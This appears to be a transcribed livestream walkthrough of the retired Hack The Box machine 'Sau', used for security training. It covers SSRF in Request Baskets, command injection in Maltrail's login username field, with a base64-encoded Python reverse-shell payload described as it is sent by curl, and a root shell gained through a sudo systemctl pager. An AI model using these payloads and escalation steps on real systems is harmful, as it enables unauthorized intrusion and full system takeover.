Sneaky steps and shadowy ways. Welcome to the lair where the code is crafty and the hacks are always ethical. Let's dive into the shadows. Hey guys, welcome back. I'm going to be continuing on with the Intro to Red Team track on Hack the Box tonight. Turn the music down just a little bit. I'm going to be doing guided mode with the SAO, I guess is how you pronounce this machine. It's a retired machine on Hack the Box. I have already connected to the VPN. So let's get into it. So I'm going to start out with Recon. First thing I'm going to do is I'm going to copy the IP, and I'm going to edit the host file so that I have DNS set up for the host. I'm just going to call this sao.htb. I'll ping this real quick. Okay, that looks like that's working, so we're good to go there. Now I'm going to scan all 65,535 ports on the host. We do have a question here. Which is the highest open TCP port on the target machine? So I'm going to run nmap first. I'm going to do tac ptac to scan all 65,535 ports on the target. Do double verbosity, tac capital PN for no ping, capital T5 for the fastest scan type, and I only want to see open ports, so I'm going to set the --open flag, and then I'm going to set this to sao.htb and run that. Okay, so far we have port 22 open, which is most likely going to be SSH. We'll see what happens here though. Looks like this is going to take about 1 minute and 5 seconds, so not too bad. Okay, about 48 seconds left. Okay, looks like we're almost done. And then once this scan completes, we will have the answer to the highest open TCP port on the target machine, and then we'll run a version and scripting scan against the specified ports to find out what services are running on those ports and what versions of those services are running. Okay, so the answer to this is going to be 55555 345. Submit. Okay, So now we're going to run another scan, just specifying these two ports, 22 and 55, 555, tech S, BC, tech capital PN, tech capital T5, tech capital, yes, tech capital T5, tech VV, P22, 55, 555, tech S capital VC, tech capital PN, tech T capital 5, yeah, and then we're gonna do, sow.htb, and then we're gonna do -o capital N, and we'll just output this to a file called sow.nmap. Okay, we'll run that. The next question is, what is the name of the open source software that the application on 55555 is powered by? And we don't know that yet. We should have the answer to that after this scan completes, though. Okay. So that finished. Let's see. Where is... Oh, here it is. Oh, what is the name of the open source software that the application on 55555 is powered by? I know it's gonna be something to do with Golang, but I'm not exactly sure where this underscore comes in. I doubt that's gonna be right. Yeah, I didn't think so. Golang underscore something. One, two, three, 4, 5, 6, 7 characters. 3, 4, 5, 6. It's not matching up with the answer. Hate it when that happens. Let me try this. Sudo nmap tech p 5, 1, 2, 3, 4, 5 tech sv. Save.htb. See if that version scan comes back with a different result with this scan. it still says Golang. Net HTTP server. Let's see. I'm gonna try browsing to that. Let's see. .htb. /su.htb. Why is that taking so long? Oh, right, I have to specify the port. 5. Damn it. HTTP //su.htb colon 12345. Oops, 12345. There we go. Powered by request baskets. Is it request underscore baskets? Dash baskets. Ah, okay. There we go. What is the version of request baskets running on SAW? Or SAO? I don't know. What's that supposed to be? Version 1.2.1. 1.2.1. Okay, so what is the 2023 CVE ID for a server-side request forgery SSRF in this version of request baskets? Okay. Request. Oops. Request baskets version 1.2.1 CVE. Okay, so it should be CVE 2023-27163. And this is... Why? Oh, interesting. This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis, which may result in further changes to the information provided. Okay, here we go. Description. Request baskets up to version 1.2.1 was discovered to contain a server-side request forgery, SSRF, via the component /API/baskets/name. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request. Okay. So this is the CVE. Task 5. What is the name of the software that the application running on port 80 is powered by? Okay, so we'll have to exploit this CVE, I'm guessing, in order to get to this task, because we didn't see that port 80 was running externally, so it's most likely running internally on localhost. So we'll have to exploit this first in order to be able to um, find out the answer to this. Okay. So let me see how I can exploit this. Whoops, too many backs. So there's this GitHub. How many stars does this have? It only has 29 stars. It's a bash script. I wonder if there's a Metasploit module for this. Ah. Why did I not put the Q? There we go. Exploit us? I've never heard of that. Another GitHub exploit. Here's another one. Oh, there's one on Packet Storm. That one might be the one to use. Zero stars. I don't really trust ones that don't have very many stars. Where? Oh, here it is. Look at the Packet Storm one. Oh, there you are. See if there is an exploit for this on Metasploit. No. Search. Okay, so there doesn't seem to be a Metasploit module. Let's see. This does. Oh, I have to accept this. Oh wow, this is small. Let's see. Bash script. Establishing the menu. Usage exploit.sh URL target. New line, new line. Hmm. So does this establish a shell and allow us to pass commands? Here's the payload. Forward underscore URL, $attacker underscore server, proxy underscore response, true, insecure underscore TLS, false, expand underscore path, true. Proxy basket. Is it? Doesn't really explain the POC or the vulnerability, really. Read this again. Request baskets up to version 1.2.1 was discovered to contain a server-side request forgery, SSRF, via the component/API/basket/name. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request. Is it the only information? Okay, here we go. A vulnerability was found in request baskets up to 1.2.1 and classified as critical. Affected by this issue is an unknown functionality of the file API basket's name of the component API request handler. The manipulation with an unknown input leads to a server-side request forgery vulnerability. Using CWE to declare the problem leads to CWE-918. The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Impacted is confidentiality, integrity, and availability. This is exactly what NVD said. The weakness was presented 4/1/2023. This vulnerability is handled as CVE 2023-27163 since 2/27/2023. There are known technical details, but no exploit is available. They need to update this because there definitely is an exploit available now. Okay. Yeah, I was wondering about that. Oh, here we go. Here's an exploit DB article. Okay. Wait. Oh, this is not for the same vulnerability. Okay. This is probably gonna be the best bet for exploiting this. So SSRF. Just so I can explain this a little bit better, about what this type of vulnerability actually is. Portswigger usually has really good explanations for this because they're, you know, kind of the gold standard for web app exploitation. So let's see. What is SSRF? Server-side request forgery is a web security vulnerability that allows an attacker to cause the server-side application to make requests to an unintended location, like the internal, well, let's just say local host of a remote machine. So if they have an internal web server, then we can access it via a SSRF vulnerability. In a typical SSRF attack, the attacker might cause the server to make a connection to internal-only services within the organization's infrastructure. In other cases, they may be able to force the server to connect to arbitrary external systems. This could leak sensitive data such as authorization credentials. So that could be what we're doing here. We could either be making a request to an unintended location, or we could cause the server to make a connection to us. Let's see. So the impact. A successful SSRF attack can often result in unauthorized actions or access to data within the organization. This can be in the vulnerable application or on other back-end systems that the application can communicate with. In some situations, the SSRF vulnerability might allow an attacker to perform arbitrary command execution. A SSRF exploit that causes connections to external third-party systems might result in malicious onward attacks. These can appear to originate from the organization hosting the vulnerable application. Common SSRF attacks. SSRF attacks often exploit trust relationships to escalate an attack from the vulnerable application and perform unauthorized actions. These trust relationships might exist in relation to the server or in relation to other back-end systems within the same organization. And then here's kind of an example of this. SSRF attacks against the server. In a SSRF attack against the server, the attacker causes the application to make a HTTP request back to the server that is hosting the application. Hey, welcome in, Anonymous Clover. Wish I was a gold standard for something. Let's see. The attacker causes the application to make a HTTP request back to the server that is hosting the application via its loopback network interface. This typically involves supplying a URL with a hostname like 127.0.0.1, a reserved IP address that points to the loopback adapter or local host, a commonly used name for the same adapter. For example, imagine a shopping application that lets the user view whether an item is in stock in a particular store. To provide the stock information, the application must query various back-end REST APIs. It does this by passing the URL to the relevant back-end API endpoint via a front-end HTTP request. When a user views the stock status for an item, their browser makes the following request. So we're making a post request to /product/stock. The content type is application /x-www-form-URL encoded. Content length is 118. And then we have the stock API being set to http://stock.wellacatoshop.net:8080/product/stock/check %3 product ID %3D 6% 26 store ID %3D1, which is just URL encoding the part of the URL. This causes the server to make a request to the specified URL, retrieve the stock status, and return this to the user. In this example, an attacker can modify the request to specify a URL local to the server. So now we have another post request to /product/stock. Content types is the same, content length is the same at being 118, and then we're setting stock API to localhost/admin. The server fetches the contents of the /admin URL and returns it to the user. An attacker can visit the /admin URL, but the administrative functionality is normally only accessible to authenticated users. This means an attacker won't see anything of interest. However, if the request to the /admin URL comes from the local machine, the normal access controls are bypassed. The application grants full access to the administrative functionality because the request appears to originate from a trusted location. Alrighty. So now that we understand SSRF a little better, interesting. Oh wait, we don't have to, I don't think we need an actual exploit. I think that there's already functionality in the site in order to be able to exploit this. So we have new basket, create a basket to collect and inspect HTTP requests. So what happens if we create this? Basket random string is successfully created. Your token is, okay. So when we create a basket, we get a token to access that basket. Okay. This basket is empty. Send request to http://sao.http or .htb :55555/random string, and they will appear here. Okay. Interesting. What if we just do localhost? Probably have to modify this. I think this is probably just gonna create another basket with the specified string. Yeah. And I don't think... Yeah, okay. So that's not... Okay, we have a forward URL in configuration settings. That's interesting. Let's see all of the, oh, okay, so we can make a response. A link to share this basket was copied to your clipboard. What is this? Delete request, destroy basket. And then we have refresh and auto refresh is enabled. Okay. Interesting. Yeah, I don't really care about this. I'm just gonna destroy that. Let's see. Master token. By providing the master token, you will gain access to all baskets. Interesting. Okay, so we get a lot more options. Actually, we can use... Oh, jeez. What happened to that? We can use this as a reference, this exploit as a reference for how to exploit this. I wonder if we could set up a shell on a web server. And serve that. Okay, so how does this work? Ah, okay, so this is exactly, it matches this exactly because we have the payload of forward underscore URL, which we have forward URL right here. And then we specify the attacker server proxy underscore response true insecure underscore TLS. So I want that checked. I want this checked. False. Wait, no. So proxy underscore response is set to true. And then insecure underscore TLS is set to false. Okay, so we don't want that to be enabled. We just want proxy response enabled. And we don't... Oh, wait. And we do want expand underscore path enabled as well. Okay. And then... Oh, and we want the capacity set to 250. 250. Okay. Echo creating the basket name, proxy basket, if response equal to $curl -s capital X post. Basket underscore URL, $URL, basket underscore name, basket created accessing, basket underscore URL now makes the server request to attacker underscore server. What I'm not sure about is if I need to serve a shell. API slash basket underscore name. Okay, so I've set all these options. Echo creating the basket name, proxy basket. Let's see. So then we post. Okay, so we changed the content type to application JSON. We're delivering. Okay, so we're delivering this payload as data. Okay. I guess? I don't see that there needs to be a shell or anything. I think I just need to specify my IP address here. And then there's... Okay, so I specify the payload as data as well as the API URL, which is API slash basket slash the name of the basket. It's gonna do all of this in the back end, I think, though. We should just set up a web server. See what happens. HTB // and I'll copy this. And I'll apply that. Basket is reconfigured. I might actually need to serve a file. Responses. It's supposed to create the basket and proxy it, and then curl, and then it's supposed to create the basket and then make a request to the attacker machine. Basket is empty. Send request to http:// See. Oh, wait a second. I think I configured this wrong. it's supposed to be... I really want to do this manually, but I could use this exploit. I think there's more to this forward URL. Oh, wait a second. Payload forward underscore URL colon backslash attacker underscore server. What is the forward URL supposed to be? I think that's just supposed to be the attacker machine. Okay, so this is saying if this is not the response, then echo fatal could not properly request $API underscore URL is the server online. Then it exits, and then basket URL equals $URL $basket underscore name. Echo basket created, echo accessing basket underscore URL. Now makes the server request to attacker server. Null then echo response body authorization response. And this doesn't do anything. So the answer to this, I forgot to even answer this question. What is this? Oh yeah. Oh wait, no, we can't answer this yet. What is this hint? Use the vulnerability in the request baskets instance to access the application running on port 80. Basic enumeration of that site will provide this information. Right, yeah, so we have to exploit this before we can even get here. I don't think I understand the vulnerability well enough. Request baskets version 1.2.1 CD. Let me look at this Medium post. Maybe this will help. Oh yeah, this should help. Also, this isn't the actual machine too, so that's good. Let's see. How does it work? As previously mentioned, Request Baskets operates as a web application designed to collect and log incoming HTTP requests directed to specific endpoints known as baskets. During the creation of these baskets, users have the flexibility to specify alternative servers to which these requests should be forwarded. The critical issue here lies in the fact that users can inadvertently specify services they shouldn't have access to, including those typically restricted within a network environment. For example, consider a scenario where the server host requests baskets on port 55555 and simultaneously runs a Flask web server on port 8000. The Flask server, however, is configured to exclusively interact with the local host. In this context, an attacker can exploit the SSRF vulnerability by creating a basket that forwards requests to http://localhost:8000, effectively bypassing the previous network restrictions and gaining access to the Flask web server, which should have been restricted to local access only. Okay, and then there's an exploit script here. I think this is the same one as on PacketStorm. Yes, it's exactly the same, I think. Okay, alright, here we go. Here's an explanation. Here's a breakdown of what the code does. Argument validation. The script checks the number of command line arguments passed to it. If the number of arguments is less than 2, or if the first argument is -h or -help, it displays usage information and exits. Parsing command line arguments. It assigns the first argument $1 to the URL variable and the second argument $2 to the attacker server variable. It also ensures that the URL ends with a slash to construct valid URLs. Okay, that makes sense. Generating a random basket name. It generates a random string of lowercase letters and assigns it to the basket name variable. Yes. Constructing API URL and payload. It constructs the API URL by appending the basket name to the URL. Okay. Then it constructs the JSON payload with various parameters, including the attacker server as the forward URL. Creating a proxy basket. The script sends a HTTP post request to the API URL. I guess I'll pause there because there is an ad on Twitch currently. Looks like it's almost over though. 5, 4, 3, 2, 1, 0. And we're back. Okay. Let's see. Creating a proxy basket. The script sends a HTTP post request to the API URL with a JSON payload as data using curl. This creates a proxy basket on the target server, forwarding requests to the attacker server. Handling the response. It checks if the curl command was successful. If it wasn't, it outputs an error message and exits. Otherwise, it displays a success message and information about the created proxy basket. Using JQ for JSON parsing. If the JQ tool is available, it attempts to parse the response JSON to extract the authorization token. If JQ is not available, it displays the entire response body. Exit. The script exits with a status of 0, indicating success. The script essentially creates a proxy basket on the target server, which forwards requests to an attacker-controlled server specified as attacker server. The attacker can use this to make the target server send requests to arbitrary destinations, potentially exposing sensitive internal resources or performing unauthorized actions. This is what I want to understand. Unauthenticated access to internal network HTTP servers. Exploiting the SSRF attack allows for unauthorized or unauthenticated access to any HTTP server connected to the same network as the request basket server. This includes internal only exposed servers like Nginx instances, internal RESTful APIs, which is NoSQL and GraphQL databases. Importantly, this access isn't limited to services hosted on the local machine. It encompasses all machines connected within the local network. Conclusion, this vulnerability underscores the importance of proper security controls and validation mechanisms to prevent unauthorized access and ensure the safe operation of web services. Understanding the nuances of SSRF vulnerabilities, like the one discovered in request baskets, is critical for both developers and security professionals, as it helps in identifying and mitigating such risks effectively. Still don't really understand how to exploit this manually. Also, one thing that I'm wondering is how we can even get to the point where we found out that port 80 is running on localhost. I'm not even sure how we figured that out in the first place. I thought this was gonna be a better explanation of how to actually exploit this. I mean, I guess I can just run the script, but I wanted to understand the exploit a little bit more before that. This can also be exploited manually. I know it can, because it has all the necessary things. What if I set this as localhost for the forward URL and applied that, and then refresh? No. Does not seem to have done anything. It's also the response. Oh. Wait a second. Is that my whole problem? Is that I need to set the response as well? Apply and then the response. Whoops. And then set the response. Name and value response body. So in here, the response. So there's the content type is set that to application JSON. Okay, so this is the name, and the value is set to application JSON. So I add that to the headers. What is $payload? Oh yeah, this is $payload. I don't think I actually have to do that because I've already set that. $API underscore URL. That's API baskets and then the basket name. This is just data though. Might not actually be able to do this like this. I can definitely do this with burp though. What am I at? A minute or an hour and 15 minutes? I'm just gonna go ahead and use this exploit at this point. This, kill this, do nano exploit.sh, paste this in here. Okay, and then I just need to run this with URL and target. Okay, so I'll save this. Then I need to make this executable. Oops, plus X. Exploit.sh. And I can run this. -E for usage? Anyway. /exploit.sh URL HTTP // main path of the server. And then I'm guessing the target is me. Okay. So I might need the IP to do this. Could try the host name, but the IP is probably going to be the best bet. Okay, and then this is running on port 55555 /API. What is it? Or is it just... Or we're creating a new basket. Yeah, okay. API/baskets. And then the target is us. I think. that's all I do? Do I have to specify an already created basket, maybe? This says /web/, so it might actually be that. /web/that, and then the target, which would be us. Bad substitution. Oh wait, main path of the server. So this would just be that then. I think we're the target, right? URL. Where does it mention target? Oh, okay, so attacker_server is the target. $2. Where does that variable get established? Oh wait, does this have to be set inside? Is this hard-coded? Well, let me try this. Bad substitution. Do these values get stored in these variables? Bad substitution. Oh, wait a second. Is the target /web/ no? where's that? Let's see. It assigns the first argument $1 to the URL variable and the second argument $2 to the attacker server variable. It also ensures that URL ends with a slash to construct valid URLs. Script checks the number of command line arguments passed to it. The number of arguments is less than 2. Or if the first argument is -h or -help, it displays usage information exits. Parsing command line arguments. It assigns the first argument $1 to the URL variable and the second argument $2 to the attacker_server variable. It also ensures that the URL ends with a slash to construct valid URLs. Generating a random basket_name. It generates a random string of lowercase letters and assigns it to the basket_name variable. This script essentially creates a proxy basket on the target server, which forwards requests to an attacker-controlled server specified as attacker_server. The attacker can use this to make the target server send requests to arbitrary destinations, potentially exposing sensitive internal resources or performing unauthorized actions. Maybe I do have to have a web server running? So the URL, whoops, the URL should be http:// the IP address of the machine, / and then the target should be bad substitution. Let me try this. I wonder if this is any different. Well, let me just do this. Explain.sh. Exploit.sh. sure why this is there, but... Okay, save that again. Make this executable. What? Syntax error, ELF and back quote substitution. Oh, jeez. Is that why? Okay, that seems to be working now. Okay, let's try this again. It should be, let's see, bad substitution. What do you mean? What is the target supposed to be? Bad substitution. I think I'm gonna do a write-up on this because I am really lost. Let's see. This is not very straightforward at all. Hack the bug, Sal, write-up. There's probably actually an official write-up to this. Oh yeah, I could look at the official write-up. This is the official write-up. Maybe not. Okay. Okay, official write-up. There we go. Okay. Let's see. Okay. Run nmap. Let's see. The nmap scan shows that OpenSSH is running on its default port. Port 22. Port 80 is open. What? Oh, but in a filtered state. Okay, so it's behind a firewall. So it's actually not technically internally facing. Port 8338 is also open and filtered, and there's an additional service listening on port 55555, which responds to HTTP requests. HTTP, as port 80 is filtered, we begin our enumeration by browsing to port 55555 and see that there is a request baskets instance running. Request baskets is a web service to collect arbitrary HTTP requests and inspect them via RESTful API or a simple web interface. Okay. Looking at the footer, we see the version that is running is version 1.2.1. A quick Google search reveals that it is vulnerable to server-side request forgery, SSRF, CB 2023-27163 via the component/API/basket/name. This vulnerability allows attackers to access network resources and sensitive information via crafted API request. Further resources can be found here. We can create a new basket to try and leverage the SSRF vulnerability to enumerate internal services running on the machine. Okay, create a basket to collect and inspect HTTP requests. Okay, so we create a basket. To test if the instance is vulnerable, we first start a netcat listener on port 80 and then try to send a HTTP request to our IP. Since we have our netcat listener up and running, we can proceed to initiate a request to determine if a connection is established with our listener. To achieve this, we must modify the request URL within the created basket to match our attacking machine's IP address. We click the gear sign at the top right left corner of our basket to bring up the configuration settings, which I did that. Then we set the forward URL to our machine's IP and hit apply. We can now try to send the GET request to our basket and see if we receive anything on our netcat listener. Okay. I believe that I can also do this with a simple web server. Let's see. Okay, so do this. I'm not going to set any of these options. I'm going to set this back to the default. Okay. Okay, so they set the forward URL and then clicked apply. And then this basket is empty, send request to, okay, so send a request to this with curl. Curl this. Okay, and we got a response back. So that means that this is vulnerable. This is the POC right here, a very simple POC. Okay. We see that we received the request we sent in our netcat listener, but I just used a simple web server for this, which works the same. Since we've discovered the instance is vulnerable and the nmap scan showed port 80 is filtered, we can use this to check which service runs on the port. We'll edit our proxy configuration again and set the forwarding URL to http://127.0.0.1:80. We also enable the following settings. That's where this comes in. Okay. So we actually need to know firsthand then that this is running port 80. Which I would have seen that with my nmap scan, except I only specified open ports. So I didn't see the filtered ports. Okay. So let's do that. Set this to IP address. Then we need to set these two options, I believe. Yes. And then this needs to, oh wait, no, this is being set to localhost on the target of 127.0.0.1. Okay. And :80. Okay. We also enable the following settings: proxy response and expand forward path. We click apply and try to access the basket in our browser. Okay. So I click apply, click OK, and then we click apply and try to access the basket in our browser. Note, we access the actual request collector, not the basket path via our browser. The URL ought to look like this. Okay, /ID, not /web/ID. Okay. Oh wait, what does it say? Proxy response. This allows the basket to behave as a full proxy. Responses from the underlying service configured in forward URL are passed back to clients of original requests. The configuration of basket responses is ignored in this case. Expand forward path. With this, the forward URL path will be expanded when original HTTP request contains a compound path. Okay. Okay. So I just take out this. I should be able to access the basket. Aha! Sweet. Okay, so this then is being forwarded to localhost, or port 80 on localhost. And so now I have access via a proxy to port 80 internally. Okay. Here we see a mail trail instance running. Looking at the footer, we can see that the version that is running is mail trail version 0.53. Okay. So let me see if I can continue on from here without looking at the write-up further. Yeah, you didn't even need an exploit for this. It's already built-in functionality. That's what I thought. I just couldn't figure out exactly how to exercise that. Okay. So this is mail trail? Or what is it? Powered by Mal Trail. Mal Trail, not Mail Trail. Okay. There is an unauthenticated command injection vulnerability in Mail Trail version 0.53. What is the relative path of the web server targeted by this exploit? Okay. So, let's see. Mail Trail version 0.53 exploit. So here's a RCE exploit. How many stars does this have? 45 stars. Let's see. In this specific case, the vulnerability exists in the login page and can be exploited via the username parameter. In this specific case, the username parameter of the login page doesn't properly sanitize the input, allowing an attacker to inject OS commands. The service uses a subprocess.check_output function to execute a shell command that logs the username provided by the user. If an attacker provides a specially crafted username, they can inject arbitrary shell commands that will be executed on the server. Okay. In shell scripting, the semicolon is used to separate multiple commands, so when the attacker provides a username that includes a semicolon followed by a shell command, the shell treats everything after the semicolon as a separate command. Basically everything after semicolon will run anyway. Okay. Exploit overview. The exploit creates a reverse shell payload encoded in base 64 to bypass potential protections like web application firewall, intrusion prevention system, or intrusion detection system, and delivers it to the target URL using a curl command. The payload is then executed on the target system, establishing a reverse shell connection back to the attacker's specified IP and port. Okay. Usage. The script requires 3 arguments: the IP address where the reverse shell should connect back to, listening IP, the port number on which the reverse shell should connect, listening port, and the URL of the target system. Okay. This is intended for educational purposes and legal use only. Always obtain proper authorization before performing penetration testing or exploiting vulnerabilities. Let's take a look at the exploit. Okay, so we're importing the sys library, OS, and base 64 libraries. We define define the main function, listening IP, listening port, and target URL. If length sys.argv is not equal to 4, print error needs listening IP, port, and target URL. Return -1. Listening IP equals sys.argv1, listening underscore port equals sys.argv2, target underscore URL equals sys.argv3 / login, print running exploit on plus string target URL. Curl command, listening IP, listening port, target URL, define curl underscore command, my IP, my port, target URL. And then the payload, Python 3 to XC, import socket OS pty equals OS pty, s equals socket.socket, sock underscore string, connect my IP, my port, py.spawn bin /sh, encoded payload, base64.64, b64 encode, and then encode the payload in base64, command equals curl, target URL -data, --data, username, echo, semicolon, echo, encoded payload. Okay, so we're just appending the encoded payload to username. Okay. os.system command. Okay, so this looks benign. I should be able to download this. I don't think this is going to be doing any kind of nastiness. CTF, hack the box, retired, Sal, save, okay. Oh crap. This is called exploit.py. Oh wait, okay, yeah. The last thing I had was exploit.sh. This is exploit.py. Okay, so I just need to do Python 3, and then let's see. Needs listening IP, port, and target URL. Okay. So this is the target URL. Listening IP. Okay, so I'm gonna set up. Let's see. I'm guessing I need to set up a listener. Oh wait, no I don't. Okay, this sets up the listener. Okay, so I have my IP, and then I'm just gonna gonna do quad 8. Or I could do 1337 because I'm elite hacker. And then the target URL is going to be this. I think. Pretty sure. Alright, let's give that a shot. Running exploit against login. Login failed. What? Can I even access login? Login failed. Going back here. Foothold. We can now leverage this proof of concept from exploit database to get a shell on the machine. First we need to download the exploit, okay. With our exploit in place, we then start a netcat listener which we will use to interact with our reverse shell connection. Now we can run the proof of concept exploit by providing our machine's IP and the port we are listening on, as well as the URL to our baskets collector. Yeah, that should be right then. Python 3 exploit.py, and then my IP with the specified port for the listener, then HTTP. Oh, wait a second. Do I have to, does this have to be the IP, I wonder? I don't think it should have to be. Can definitely try that though. Maybe that's the problem. Come on. Login failed. Oh. Let me try this exploit. Okay, this is the same. This is right. I guess let's try this again. Come on. Login failed. This is not working how this is supposed to. Should just work. So I'm using the exact same exploit. Or do... Oh, I do... Of course. I actually do have to set up a netcat listener. It doesn't set up one. This just is specifying the port for the listener. I think that's why this isn't working. I guess I'm doing quad 8 for the listener. Okay, this should work then. Ah, awesome. Okay, so I have a shell. Puma. To get a more stable shell, we can use the following sequence of commands. I wonder, does this have Python 3? Yes, okay. Python 3 taxi import pty, whoops, pty, semicolon pty dot spawn slash bin slash bash. Yes. Okay, so that's more stable, and then I do Control Z to suspend that, and then stty raw dash echo semicolon foreground, and then term equals x term. Yes, okay. And that also shouldn't, then my shell should not be killed. Okay. Let's see. We can answer this. Oh, this is gonna be such login. What system user is the mail track application running on as on SAU? That would be, oh, what was it? Oh yeah, Puma. We're on Who Am I? And Puma. And then go to their home directory and get the first flag. I guess I'll give it a 6. What is the full path to the binary without arguments? The Puma user can run as root and sow. Oh, sudo L. Okay, I can run systemctl. User in systemctl. What is the full version string for the instance of systemd installed on sow? What is the full version string for the instance of systemd installed? So, would it be systemd dash version? Aha, okay, that should be this, I think. It's supposed to be in parentheses, isn't it? What? Oh, is it supposed to be 245 space? That? No? Oh. Oh, I get it now. System D 2, 4, 5, and then this in parentheses. That's what they want. What is the 2023 CVE ID for a local privilege escalation vulnerability in this version of System D? It's a 2023 CVE though. Yeah. Okay, maybe this will tell me the CVE. Okay, so now I need to escalate our privileges with this particular CVE. So how does this work? Okay, System D 246 was discovered to contain privilege escalation vulnerability. When the system CTL status command can be run as root user, this vulnerability allows the local attacker to gain root privileges. Proof of concept, run the system CTL command which can be run as root user. Sudo user bin system CTL status any underscore service. The output is open in a pager, less, which allows us to execute arbitrary commands. Type in !bin/bin/sh in the pager to spawn a shell as root user. Okay. Sudo user bin system CTL status. Can I just do star? Oh crap. Why is it asking me for my password? I think this should be stabilized. Oh yeah, I could have just done that. Okay. You do have a stable shell now. Sudo type L. Oh, okay, so I can only run this specific command. Got it. So I'll do that, and then we should have opened up a pager, and so now if I do !bin/sh. Wait, no, it didn't open up a pager. Why is that? Oh, I didn't run it as sudo, that's why. So now if I just do !, or can I not do that? Oh, okay. That works. I am root, cd into/root, and cat root.txt. And there's the root flag. Okay, sweet. That wasn't too bad. I'll just say easy for that. Alright, awesome, and I finally successfully pwned that machine. Okay. So let's look at this. Okay, that was a pretty interesting machine. Go ahead and... Man, I really should start doing write-ups again. I'll probably do that later. And maybe I'll just leave this up so I can do that. Well, actually I did... crap. I'll deal with that later. Is there anyone on to raid? Could raid the Shy Hat. What are these doing? Actually, nah, I guess I won't raid tonight. Alright, well, I think I'm gonna go ahead and end the stream there. Hopefully you guys enjoyed the content and learned something. I definitely learned a lot, I do every time. But hopefully I'll see you guys again on Thursday. Thanks everybody who joined. See you next time.